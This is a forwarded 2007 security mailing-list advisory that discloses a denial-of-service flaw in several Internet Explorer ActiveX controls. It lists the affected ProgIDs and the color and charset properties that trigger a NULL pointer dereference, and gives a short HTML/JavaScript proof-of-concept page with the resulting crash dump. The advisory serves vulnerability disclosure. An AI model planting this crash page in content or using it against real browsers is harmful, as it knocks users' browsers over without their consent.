Thread-topic: [NT] Internet Explorer ActiveX bgColor Property DoS
> -----Original Message-----
> From: SecuriTeam [mailto:support@xxxxxxxxxxxxxx]
> Sent: Monday, January 29, 2007 12:43 PM
> To: html-list@xxxxxxxxxxxxxx
> Subject: [NT] Internet Explorer ActiveX bgColor Property DoS
>
> Internet Explorer ActiveX bgColor Property DoS
>
>
>
> Determina Security Research has discovered a denial of
> service vulnerability in multiple ActiveX controls included
> in Internet Explorer. This vulnerability can be exploited by
> a malicious web page and results in a termination of the
> Internet Explorer process. Our analysis indicates that remote
> code execution is unlikely. The vulnerable ActiveX controls
> are installed by default with all versions of Internet
> Explorer on Windows 2000, XP, 2003 and Vista.
>
>
> This vulnerability was found by a fuzzer that instantiates
> all ActiveX controls on the system and enumerates their
> properties. We discovered multiple controls that crash with
> an invalid memory access exception when certain object
> properties are accessed through JavaScript. Most of the
> vulnerable ActiveX controls are in MSHTML.DLL and are
> exploitable on all versions of Internet Explorer. Their
> ProgIDs are given below:
>
> giffile
> htmlfile
> jpegfile
> mhtmlfile
> ODCfile
> pjpegfile
> pngfile
> xbmfile
> xmlfile
> xslfile
> wdpfile
>
> The following two controls in TRIEDIT.DLL are exploitable
> without user interaction only on Internet Explorer 5 and 6:
>
> TriEditDocument.TriEditDocument
> TriEditDocument.TriEditDocument.1
>
> Accessing one of the bgColor, fgColor, linkColor, alinkColor,
> vlinkColor or defaultCharset properties of the controls
> listed above results in a NULL pointer dereference and an
> unhandled memory access violation. It is hard to tell what
> the root cause and full impact of this vulnerability are, but
> remote code execution seems unlikely at this point.
>
> Microsoft has taken steps to minimize the attack surface
> presented by the ActiveX controls in Internet Explorer 7. The
> ActiveX Opt-In feature prevents previously unused ActiveX
> controls from running, unless the user explicitly allows
> their instantiation. The only controls that can run without
> prompting the user are the ones included on a pre-approved
> list in the system registry. All vulnerable MSHTML.DLL
> controls listed above are on the pre-approved list, allowing
> the vulnerability to be exploited with no user interaction on
> IE7 running on both Windows XP and Vista.
> Proof of Concept:
>
> The following .HTML file will trigger the vulnerability:
>
> <html>
> <body>
> <script language="JavaScript">
> obj = new ActiveXObject("giffile");
> obj.bgColor;
> </script>
> </body>
> </html>
>
> Opening the file in Internet Explorer results in the
> following NULL-pointer dereference:
>
> (a9c.72c): Access violation - code c0000005 (!!! second chance !!!)
> eax=00000000 ebx=7ded51fc ecx=01253b90 edx=00000000
> esi=00038ff8 edi=01253c40
> eip=7dda1dde esp=0013dfb0 ebp=0013dfbc iopl=0 nv up ei pl nz na pe nc
> cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
> mshtml!CDocument::get_bgColor+0x7e:
> 7dda1dde ff30 push dword ptr [eax] ds:0023:00000000=????????
>
>
> Additional Information:
> The information has been provided by Alexander Sotirov
> <mailto:asotirov@xxxxxxxxxxxxx> .
> The original article can be found at:
>
> ivex-bgcolor.html
>
>
